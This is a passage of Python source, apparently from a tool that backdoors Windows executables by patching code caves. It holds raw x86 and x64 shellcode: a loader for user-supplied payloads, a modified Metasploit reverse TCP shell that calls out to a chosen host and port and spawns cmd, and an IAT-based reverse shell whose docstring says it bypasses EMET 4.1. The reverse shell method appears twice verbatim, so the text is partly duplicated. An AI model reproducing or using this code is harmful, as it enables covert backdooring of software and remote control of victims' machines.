print "[!] User must provide shellcode for this module (-U)"
sys.exit(0)
else:
self.supplied_shellcode = open(self.SUPPLIED_SHELLCODE, 'r+b').read()
breakupvar = eat_code_caves(flItms, 0, 1)
self.shellcode1 = ("\xFC\x90\xE8\xC1\x00\x00\x00\x60\x89\xE5\x31\xD2\x90\x64\x8B"
"\x52\x30\x8B\x52\x0C\x8B\x52\x14\xEB\x02"
"\x41\x10\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC\x3C\x61"
"\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\x49\x75\xEF\x52\x90\x57\x8B"
"\x52\x10\x90\x8B\x42\x3C\x01\xD0\x90\x8B\x40\x78\xEB\x07\xEA\x48"
"\x42\x04\x85\x7C\x3A\x85\xC0\x0F\x84\x68\x00\x00\x00\x90\x01\xD0"
"\x50\x90\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x58\x49\x8B\x34\x8B"
"\x01\xD6\x31\xFF\x90\x31\xC0\xEB\x04\xFF\x69\xD5\x38\xAC\xC1\xCF"
"\x0D\x01\xC7\x38\xE0\xEB\x05\x7F\x1B\xD2\xEB\xCA\x75\xE6\x03\x7D"
"\xF8\x3B\x7D\x24\x75\xD4\x58\x90\x8B\x58\x24\x01\xD3\x90\x66\x8B"
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x90\xEB\x04\xCD\x97\xF1\xB1\x8B\x04"
"\x8B\x01\xD0\x90\x89\x44\x24\x24\x5B\x5B\x61\x90\x59\x5A\x51\xEB"
"\x01\x0F\xFF\xE0\x58\x90\x5F\x5A\x8B\x12\xE9\x53\xFF\xFF\xFF\x90"
"\x5D\x90"
"\xBE")
self.shellcode1 += struct.pack("<H", len(self.supplied_shellcode) + 5)
self.shellcode1 += ("\x00\x00"
"\x90\x6A\x40\x90\x68\x00\x10\x00\x00"
"\x56\x90\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x89\xC3\x89\xC7\x90"
"\x89\xF1"
)
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3)
else:
self.shellcode1 += "\xeb\x44" # <--length of shellcode below
self.shellcode1 += "\x90\x5e"
self.shellcode1 += ("\x90\x90\x90"
"\xF2\xA4"
"\xE8\x20\x00\x00"
"\x00\xBB\xE0\x1D\x2A\x0A\x90\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06"
"\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF"
"\xD5\x31\xC0\x50\x50\x50\x53\x50\x50\x68\x38\x68\x0D\x16\xFF\xD5"
"\x58\x58\x90\x61"
)
breakupvar = eat_code_caves(flItms, 0, 2)
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(0xffffffff + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3).rstrip("L")), 16))
#else:
# self.shellcode1 += "\xEB\x06\x01\x00\x00"
#Begin shellcode 2:
breakupvar = eat_code_caves(flItms, 0, 1)
if flItms['cave_jumping'] is True:
self.shellcode2 = "\xe8"
if breakupvar > 0:
if len(self.shellcode2) < breakupvar:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - breakupvar -
len(self.shellcode2) + 241).rstrip("L")), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - len(self.shellcode2) -
breakupvar + 241).rstrip("L")), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(abs(breakupvar) + len(self.stackpreserve) +
len(self.shellcode2) + 234).rstrip("L")), 16))
else:
self.shellcode2 = "\xE8\xB7\xFF\xFF\xFF"
#Can inject any shellcode below.
self.shellcode2 += self.supplied_shellcode
self.shellcode1 += "\xe9"
self.shellcode1 += struct.pack("<I", len(self.shellcode2))
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2
return (self.stackpreserve + self.shellcode1, self.shellcode2)
def reverse_shell_tcp_inline(self, flItms, CavesPicked={}):
"""
Modified metasploit windows/x64/shell_reverse_tcp
"""
if self.PORT is None:
print ("This payload requires the PORT parameter -P")
return False
if self.HOST is None:
print "This payload requires a HOST parameter -H"
return False
breakupvar = eat_code_caves(flItms, 0, 1)
self.shellcode1 = ("\xfc"
"\x48\x83\xe4\xf0"
"\xe8")
if flItms['cave_jumping'] is True:
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar -
len(self.stackpreserve) - len(self.shellcode1) - 3)
else:
self.shellcode1 += "\xc0\x00\x00\x00"
self.shellcode1 += ("\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff")
self.shellcode2 = ("\x5d\x49\xbe\x77\x73\x32\x5f\x33"
"\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00"
"\x49\x89\xe5\x49\xbc\x02\x00")
self.shellcode2 += struct.pack('!H', self.PORT)
self.shellcode2 += self.pack_ip_addresses()
self.shellcode2 += ("\x41\x54"
"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c"
"\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff"
"\xd5\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89\xc2"
"\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5\x48"
"\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99"
"\xa5\x74\x61\xff\xd5\x48\x81\xc4\x40\x02\x00\x00\x49\xb8\x63"
"\x6d\x64\x00\x00\x00\x00\x00\x41\x50\x41\x50\x48\x89\xe2\x57"
"\x57\x57\x4d\x31\xc0\x6a\x0d\x59\x41\x50\xe2\xfc\x66\xc7\x44"
"\x24\x54\x01\x01\x48\x8d\x44\x24\x18\xc6\x00\x68\x48\x89\xe6"
"\x56\x50\x41\x50\x41\x50\x41\x50\x49\xff\xc0\x41\x50\x49\xff"
"\xc8\x4d\x89\xc1\x4c\x89\xc1\x41\xba\x79\xcc\x3f\x86\xff\xd5"
"\x48\x31\xd2\x90\x90\x90\x8b\x0e\x41\xba\x08\x87\x1d\x60\xff"
"\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48"
"\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13"
"\x72\x6f\x6a\x00\x59\x41\x89\xda"
"\x48\x81\xc4\xf8\x00\x00\x00" # Add RSP X ; align stack
)
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2 + self.stackrestore
return (self.stackpreserve + self.shellcode1, self.shellcode2 + self.stackrestore)
def iat_reverse_tcp(self, flItms, CavesPicked={}):
"""
Position dependent shellcode that uses API thunks of LoadLibraryA and
GetProcAddress to find and load APIs for callback to C2.
Bypasses EMET 4.1. Idea from Jared DeMott:
http://labs.bromium.com/2014/02/24/bypassing-emet-4-1/
via @bannedit0 (twitter handle)
"""
if self.PORT is None:
print ("Must provide port")
return False
if 'LoadLibraryA' not in flItms:
print "[!] Binary does not have the LoadLibraryA API in IAT"
return False
if 'GetProcAddress' not in flItms:
print "[!] Binary does not have GetProcAddress API in IAT"
return False
self.shellcode1 = "\xfc" # CLD
self.shellcode1 += "\xbb" # mov value below to EBX
if flItms['LoadLibraryA'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']) < 0:
self.shellcode1 += struct.pack("<I", 0xffffffff + (flItms['LoadLibraryA'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']) + 1))
else:
self.shellcode1 += struct.pack("<I", flItms['LoadLibraryA'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']))
self.shellcode1 += "\x01\xD3" # add EBX + EDX
self.shellcode1 += "\xb9" # mov value below to ECX
if flItms['GetProcAddress'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']) < 0:
self.shellcode1 += struct.pack("<I", 0xffffffff + (flItms['GetProcAddress'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']) + 1))
else:
self.shellcode1 += struct.pack("<I", flItms['GetProcAddress'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']))
self.shellcode1 += "\x01\xD1" # add ECX + EDX
self.shellcode1 += ("\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x87\xF1\xFF\x13\x68"
"\x75\x70\x00\x00\x68\x74\x61\x72\x74\x68\x57\x53\x41\x53\x54\x50"
"\x97\xFF\x16\x95\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\xFF\xD5\x68"
"\x74\x41\x00\x00\x68\x6F\x63\x6B\x65\x68\x57\x53\x41\x53\x54\x57"
"\xFF\x16\x95\x31\xC0\x50\x50\x50\x50\x40\x50\x40\x50\xFF\xD5\x95"
"\x68\x65\x63\x74\x00\x68\x63\x6F\x6E\x6E\x54\x57\xFF\x16\x87\xCD"
"\x95\x6A\x05\x68")
self.shellcode1 += self.pack_ip_addresses() # HOST
self.shellcode1 += "\x68\x02\x00"
self.shellcode1 += struct.pack('!H', self.PORT) # PORT
self.shellcode1 += ("\x89\xE2\x6A"
"\x10\x52\x51\x87\xF9\xFF\xD5"
)
#breakupvar is the distance between codecaves
breakupvar = eat_code_caves(flItms, 0, 1)
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9" # JMP opcode
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3)
self.shellcode2 = ("\x85\xC0\x74\x00\x6A\x00\x68\x65\x6C"
"\x33\x32\x68\x6B\x65\x72\x6E\x54\xFF\x13\x68\x73\x41\x00\x00\x68"
"\x6F\x63\x65\x73\x68\x74\x65\x50\x72\x68\x43\x72\x65\x61\x54\x50"
"\xFF\x16\x95\x93\x68\x63\x6D\x64\x00\x89\xE3\x57\x57\x57\x87\xFE"
"\x92\x31\xF6\x6A\x12\x59\x56\xE2\xFD\x66\xC7\x44\x24\x3C\x01\x01"
"\x8D\x44\x24\x10\xC6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4E\x56"
"\x56\x53\x56\x87\xDA\xFF\xD5\x89\xE6\x6A\x00\x68\x65\x6C\x33\x32"
"\x68\x6B\x65\x72\x6E\x54\xFF\x13\x68\x65\x63\x74\x00\x68\x65\x4F"
"\x62\x6A\x68\x69\x6E\x67\x6C\x68\x46\x6F\x72\x53\x68\x57\x61\x69"
"\x74\x54\x50\x95\xFF\x17\x95\x89\xF2\x31\xF6\x4E\x56\x46\x89\xD4"
"\xFF\x32\x96\xFF\xD5\x81\xC4\x34\x02\x00\x00"
)
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2 + self.stackrestore
return (self.stackpreserve + self.shellcode1, self.shellcode2 + self.stackrestore)
def reverse_shell_tcp_inline(self, flItms, CavesPicked={}):
"""
Modified metasploit windows/x64/shell_reverse_tcp
"""
if self.PORT is None:
print ("This payload requires the PORT parameter -P")
return False
if self.HOST is None:
print "This payload requires a HOST parameter -H"
return False
breakupvar = eat_code_caves(flItms, 0, 1)
self.shellcode1 = ("\xfc"
"\x48\x83\xe4\xf0"
"\xe8")
if flItms['cave_jumping'] is True:
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar -
len(self.stackpreserve) - len(self.shellcode1) - 3)
else:
self.shellcode1 += "\xc0\x00\x00\x00"
self.shellcode1 += ("\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff")
self.shellcode2 = ("\x5d\x49\xbe\x77\x73\x32\x5f\x33"
"\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00"
"\x49\x89\xe5\x49\xbc\x02\x00")
self.shellcode2 += struct.pack('!H', self.PORT)
self.shellcode2 += self.pack_ip_addresses()
self.shellcode2 += ("\x41\x54"
"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c"
"\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff"
"\xd5\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89\xc2"
"\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5\x48"
"\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99"
"\xa5\x74\x61\xff\xd5\x48\x81\xc4\x40\x02\x00\x00\x49\xb8\x63"
"\x6d\x64\x00\x00\x00\x00\x00\x41\x50\x41\x50\x48\x89\xe2\x57"
"\x57\x57\x4d\x31\xc0\x6a\x0d\x59\x41\x50\xe2\xfc\x66\xc7\x44"
"\x24\x54\x01\x01\x48\x8d\x44\x24\x18\xc6\x00\x68\x48\x89\xe6"
"\x56\x50\x41\x50\x41\x50\x41\x50\x49\xff\xc0\x41\x50\x49\xff"
"\xc8\x4d\x89\xc1\x4c\x89\xc1\x41\xba\x79\xcc\x3f\x86\xff\xd5"
"\x48\x31\xd2\x90\x90\x90\x8b\x0e\x41\xba\x08\x87\x1d\x60\xff"
"\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48"
"\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13"
"\x72\x6f\x6a\x00\x59\x41\x89\xda"
"\x48\x81\xc4\xf8\x00\x00\x00" # Add RSP X ; align stack
)
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2 + self.stackrestore
return (self.stackpreserve + self.shellcode1, self.shellcode2 + self.stackrestore)
